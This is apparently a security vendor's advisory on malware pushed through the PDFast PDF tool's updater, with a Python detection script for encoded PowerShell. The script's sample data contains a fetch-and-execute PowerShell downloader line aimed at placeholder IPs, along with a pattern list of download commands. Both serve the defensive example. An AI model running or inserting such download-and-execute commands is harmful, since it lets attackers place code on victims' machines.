Update: 4/21, 12:06 PM MT: Certificates used for signing malicious versions of PDFast have now been revoked. However, threat actors will keep finding new ways to compromise victims. Todyl will continue monitoring and update detections as needed.
Update: 4/17, 10:48 AM MT: Windows Defender is now blocking PDFast as well, but it appears the attackers are currently manipulating the code to avoid detection. Todyl MXDR and Detections Engineering are actively working to block changes in the code as they arise.
The Todyl MXDR team has detected malware being distributed from within a free PDF tool called PDFast (pdf-fast[.]com). All affected Todyl partners were alerted immediately upon discovery, and non-MXDR partners have been notified by email. In addition, the MXDR team pushed a global block to all EDR customers within 30 minutes of detection and a global update to Todyl SASE to block any communication with the malicious sites.
These updates immediately stop further compromise by preventing any communication and/or downloads from the malicious sites.
Stay tuned to this blog post as we will post more updates as we uncover more information.
The MXDR team uncovered widespread malicious encoded PowerShell originating from "upd.exe", an update service executable that ships with the PDFast software. Because upd.exe runs as a Windows service, its parent is services.exe, the Windows Service Control Manager (which is itself started by wininit.exe). Both are legitimate Windows processes, so the parent chain alone looks benign; the tell is the encoded PowerShell that upd.exe spawns.
Using Todyl SIEM, the MXDR team confirmed that the malicious executable and the encoded PowerShell it launches were triggered by a PDFast service. This indicates that the malicious code was either introduced through PDFast's development supply chain or intentionally included within the software itself.
When executed, the encoded PowerShell script downloads malware from two malicious URLs hosted in China. Todyl's MXDR team is currently reverse engineering the payload to determine the full scope of the threat.
The malicious PowerShell was detected by Todyl's EDR and SIEM simultaneously. Todyl's EDR in Prevent mode automatically blocks the PowerShell script from running.
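The behaviour described above (a legitimate-looking service binary spawning encoded PowerShell that reaches out to download URLs) is easy to hunt for in process-creation telemetry. The following is an added example written for this post, not Todyl's detection logic or anything from PDFast: it triages Sysmon Event ID 1 style records, decodes `-EncodedCommand` payloads (base64 of UTF-16LE text) and scores them by parent process. The sample events, the `C:\Program Files\PDFast\upd.exe` install path and the URLs inside the decoded script are constructed placeholders, not the indicators from this incident.

```python
"""Added example: triage process-creation events for encoded PowerShell
spawned by PDFast's upd.exe. Sample data below is constructed; the install
path and URLs are placeholders, not indicators from the incident."""
import base64
import json
import re
from typing import Iterable, List, Optional

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for an encoded command.
# "-ep" (ExecutionPolicy) is excluded because whitespace must follow the flag.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Invoke-RestMethod", re.IGNORECASE)
SUSPECT_PARENT = "upd.exe"  # PDFast's update service binary (assumed basename)


def build_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload; not worth a false positive here


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: Iterable[dict]) -> List[dict]:
    """Flag PowerShell encoded commands; rank by parent image and download primitives."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1 or basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
            continue
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded is None:
            continue
        parent = basename(ev.get("ParentImage", ""))
        if parent == SUSPECT_PARENT:
            severity = "high"        # the PDFast updater has no business running PowerShell
        elif DOWNLOAD_RE.search(decoded):
            severity = "medium"      # encoded downloader from some other parent
        else:
            severity = "info"        # encoded, but no download primitive; review manually
        findings.append({"parent": parent, "severity": severity,
                         "urls": URL_RE.findall(decoded), "decoded": decoded})
    return findings


# Constructed sample script and events (Sysmon Event ID 1 field names).
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage1.txt'); "
                 "Invoke-WebRequest 'http://203.0.113.7/stage2.bin' -OutFile $env:TEMP\\s.bin")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -ec " + build_encoded("Get-Service")},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Program Files\PDFast\upd.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + build_encoded(SAMPLE_SCRIPT)},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(json.dumps(f, indent=2))
```

The rule deliberately keys on the direct parent (upd.exe) rather than on services.exe, because services.exe launches every Windows service and would match far too broadly; the decoded script and extracted URLs are returned so the analyst can feed them straight into a web-filter block list.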
Uninstall all instances of PDFast as soon as possible to prevent further compromise. Note that uninstalling removes the delivery mechanism, not any payload that was already downloaded; treat any host on which the encoded PowerShell ran unblocked as compromised until it has been reviewed.
MXDR partners, please reach out to your DRAM if you are concerned that you’ve been affected. You may also submit any similar sites of concern to the MXDR team, and we will review them as soon as possible.
If you’re not currently using Todyl EDR or SASE, you can add each product module for immediate protection against this PDFast threat and other prominent threats. Contact us to learn more.